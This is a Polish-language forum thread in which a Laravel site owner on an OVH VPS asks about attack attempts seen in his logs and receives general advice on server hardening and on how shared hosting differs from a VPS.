2. Czy sam zabezpieczałeś serwer?

katakrowa napisał(a):

1. A co to za strona była? Na jakim Framework. Część wpisów wygląda na prymitywny atak, którego celem było wyciągnięcie plików konfiguracyjnych. Na takie ataki podatne są stare lub nieaktualizowane Frameworki.
2. Czy sam zabezpieczałeś serwer?

1. Czy te ataki są bardzo niebezpieczne? Czy to są jakieś automaty ? Framework mam Laravel Framework 8.63.0, ale na innej sudomenie była czysta strona html i na niej tez nie działał.
2. Nie zabezpieczałem serwera chyba tylko było zabezpieczenie po stronie OVH (serwwerVPS)

Nie zabezpieczałem serwera chyba tylko było zabezpieczenie po stronie OVH (serwwerVPS)

No jak masz VPS to zdecydowanie zabezpieczenie tego jest po Twojej stronie - regułki firewalla, regularne patche na usługi i ich aktualizacja, ograniczenie dostępów do niektórych usług do wybranych adresów (albo np. przez VPN), jakieś logowanie do SSH z certyfikatem/kluczem, zmiana portów niektórych usług, włączenie logowania zdarzeń, zablokowanie dostępu roota, zmiana domyślnych loginów i haseł, wyłączenie niepotrzebnych usług i tak dalej.

Po stronie hostingu jedynie możesz mieć backupy wirtualki oraz jakieś zabezpieczenie przed jakimiś DOS'ami. Ale cała reszta to już Twój problem.

cerrato napisał(a):

Nie zabezpieczałem serwera chyba tylko było zabezpieczenie po stronie OVH (serwwerVPS)

No jak masz VPS to zdecydowanie zabezpieczenie tego jest po Twojej stronie - regułki firewalla, regularne patche na usługi i ich aktualizacja, ograniczenie dostępów do niektórych usług do wybranych adresów (albo np. przez VPN), jakieś logowanie do SSH z certyfikatem/kluczem, zmiana portów niektórych usług, włączenie logowania zdarzeń, zablokowanie dostępu roota, zmiana domyślnych loginów i haseł, wyłączenie niepotrzebnych usług i tak dalej.

Po stronie hostingu jedynie możesz mieć backupy wirtualki oraz jakieś zabezpieczenie przed jakimiś DOS'ami. Ale cała reszta to już Twój problem.

Czy ja dobrze rozumiem, że po stronie vps ma się większe zabezpieczenia niż po hostingu ?

Hosting i VPS to są dwie zupełnie różne rzeczy.

Jak kupujesz hosting to dostajesz gotową usługę - najczęściej serwer WWW i poczty,którym zarządza dostawca. Po jego stronie masz wszystkie aktualizacje, dopieszczanie konfiguracji, zabezpieczenia usług itp, a Ty po prostu dostajesz miejsce, w które jak wrzucisz swoje pliki, to będą one serwowane całemu światu.

Za to VPS jest po prostu serwerem - całą maszyną (wprawdzie wirtualną, ale to nie ma znaczenia). To trochę jakbyś wziął jakiś komputer, postawił na nim system i podpiął kabelkiem do modemu/routera, przez co cały świat ma łączność z Twoim serwerem. I teraz jedynie od Ciebie zależy, co na tym kompie będzie odpalone, jak go zabezpieczysz, czy usługi i system będą aktualizowane itp.

To, że VPS stoi w jakiejś serwerowni to jedynie kwestia logistyczna, formalnie rzecz biorąc możesz uznać, że to jest stojący u Ciebie w sypialni komputerek, który kabelkiem leci w świat. I co z nim zrobisz to Twój problem, hosting nie odpowiada za nic (poza tym, żeby komputerek działał bez przerw i stabilnie oraz posiadał zadeklarowane zasoby typu RAM czy vCPU)